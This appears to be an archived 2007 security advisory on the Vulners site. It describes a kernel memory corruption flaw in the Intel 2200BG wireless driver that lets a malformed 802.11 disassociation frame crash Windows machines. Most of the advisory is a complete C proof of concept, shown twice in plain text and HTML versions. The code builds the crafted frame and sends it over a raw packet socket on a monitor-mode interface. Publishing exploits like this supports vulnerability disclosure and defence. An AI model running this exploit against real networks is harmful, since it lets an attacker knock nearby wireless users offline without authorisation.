Vulners
Lucene search
intel-dos.txt
`------=_Part_72042_24806074.1169818557157
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)
Proof Of Concept:
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// 28 bytes disassociation packet.
char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
0x00, 0x00, // Duration ID
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
0x00, 0x00, // Frag. Number
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s;
char packet[sizeof(d)];
int len = 0;
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(packet,sizeof(d));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(packet,d,sizeof(d));
len = sendto(s,packet,sizeof(d), 0, NULL, 0);
usleep(5000);
printf("%d bytes enviados\n",len);
close(s);
return 0;
}
------=_Part_72042_24806074.1169818557157
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
<p>Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p>
<p>Description: The intel wireless mini-pci driver provided with Intel<br>2200BG cards is vulnerable to a remote memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD)
</p>
<p>This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).</p>
<p>Driver files:</p>
<p>w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll 980f58b157baedc23026dd9302406bdd</p>
<p>Author: Breno Silva Pinto ( <a href="http://Sekure.org">Sekure.org</a> ) / bsilva[at]sekure[dot]org)<br> </p>
<p>Proof Of Concept:</p>
<p>#include <unistd.h><br>#include <sys/types.h><br>#include <sys/socket.h><br>#include <sys/ioctl.h><br>#include <asm/types.h><br>#include <linux/if.h><br>#include <linux/if_packet.h>
<br>#include <linux/if_ether.h><br>#include <linux/if_arp.h><br>#include <netinet/in.h><br>#include <stdlib.h><br>#include <string.h><br>#include <stdio.h></p>
<p>// 28 bytes disassociation packet.</p>
<p>char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal<br> 0x00, 0x00, // Duration ID<br> 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br> 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
<br> 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br> 0x00, 0x00, // Frag. Number<br> 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p>
<p>int main() {<br> struct sockaddr_ll link;<br> struct ifreq iface;<br> int s;<br> char packet[sizeof(d)];<br> int len = 0;</p>
<p> if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)<br> return 0;</p>
<p> bzero(&iface,sizeof(iface));<br> bzero(&link,sizeof(link));<br> bzero(packet,sizeof(d));</p>
<p> strcpy(iface.ifr_name,"ath0raw");</p>
<p> if(ioctl(s,SIOCGIFHWADDR, &iface)) {<br> return 0;<br> }<br> <br> if(ioctl(s,SIOCGIFINDEX, &iface)) {<br> return -1;<br> }</p>
<p> if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {<br> return -1;<br> }</p>
<p> link.sll_family = AF_PACKET;<br> link.sll_ifindex = iface.ifr_ifindex;<br> <br> if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {<br> return -1;<br> }</p>
<p> memcpy(packet,d,sizeof(d));<br> len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br> usleep(5000); <br> printf("%d bytes enviados\n",len);</p>
<p> close(s);</p>
<p> return 0;<br>}</p>
<p> </p>
------=_Part_72042_24806074.1169818557157--
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4